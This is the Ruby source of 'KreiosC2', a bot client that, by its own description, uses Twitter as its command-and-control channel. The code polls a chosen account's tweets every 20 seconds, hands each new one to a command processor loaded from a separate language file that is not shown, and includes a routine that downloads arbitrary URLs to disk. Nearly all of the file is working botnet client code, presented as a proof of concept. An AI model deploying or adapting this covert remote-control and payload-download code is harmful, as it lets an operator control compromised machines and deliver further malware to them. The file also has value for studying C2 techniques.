#!/usr/bin/env ruby

require "lib/twitter"
require 'net/http'
require 'getoptlong'
require "default_language.rb"

# == KreiosC2: A bot written to use Twitter as its C&C
#
# KreiosC2 uses Twitter as its command and control channel. It is a 
# proof of concept only
#
# == Usage
# kreiosc2 [OPTION]
#	--previous, -p:
#		process historical commands
#	--language x, -l x:
#		use the specified command language file
#	--help, -h:
#		show help
#	-v: verbose
#
# Author:: Robin Wood (dninja@gmail.com)
# Copyright:: Copyright (c) Robin Wood 2009
# Licence:: GPL
#

# This is the name of the user to watch for commands
SCREEN_NAME="<SCREEN_NAME>"

# Validate an IP address
def validate_ip(ip)
	return ip =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/
end

# Download the specified url and save it as the given filename
# The file is only saved if a 200 is returned, the function then returns true
# Anything else and the function returns false
def download_file url, filename
	begin
		http_response = Net::HTTP.get_response(URI.parse(url))

		while (http_response.kind_of?(Net::HTTPRedirection))
			new_url = http_response['Location']
			http_response = Net::HTTP.get_response(URI.parse(new_url))
		end
		
		if !http_response.value.nil?
			return false
		end

		output = File.new filename,"w"
		output.puts http_response.body
		output.close

		return true
	rescue
		return false
	end
end

# Search for commands and act on them
def get_process_commands(verbose)
	search=Twitter::Search.new()

	search_results=search.from(SCREEN_NAME)
	search_results.reverse_each { |result|
		if @latest_read == nil or Time.parse(result.created_at) > @latest_read
			@latest_read=Time.parse(result.created_at)

			if verbose
				puts result.created_at + " - " + result.text
			end
			
			process_message(result.text, verbose)
		else
			if verbose
				puts "Command already seen, ignoring"
			end
		end
	}
end

opts = GetoptLong.new(
	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
	[ '--language', "-l" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--previous', '-p', GetoptLong::NO_ARGUMENT ],
	[ "-v" , GetoptLong::NO_ARGUMENT ]
)

# Display the usage
def usage
	puts"kreiosc2 1.0 Robin Wood (dninja@gmail.com) (www.digininja.org)

Usage: kreiosc2 [OPTION]
	--previous, -p: process historical commands
	--language x, -l x: use the specified command language file
	--help, -h: show help
	-v: verbose

"
	exit
end

verbose=false
@latest_read=Time.new()

begin
	opts.each do |opt, arg|
		case opt
			when "--language"
				filename=arg
				if File.exists?(filename)
					require filename
					puts "Using language file " + filename
				else
					if verbose
						puts "Language file not found, using default"
					end
				end
			when '--previous'
				# setting this to nil means process all the previous commands
				# otherwise the default is to process from now
				@latest_read=nil
			when '--help'
				usage
			when '-v'
				verbose=true
		end
	end
rescue
	usage
end

interrupted = false

# Should really let the loop do the finish but if the interrupt happens during the sleep then you have to 
# wait for the sleep to finish which is boring
trap("INT") {
	interrupted = true
	puts "Goodbye"
	exit
}

while(!interrupted)
	begin
		if verbose
			puts "Checking for commands"
		end
		get_process_commands(verbose)
		if verbose
			puts "Sleeping"
		end
		sleep(20)
	rescue
		puts "rescue" + $!
	end
end
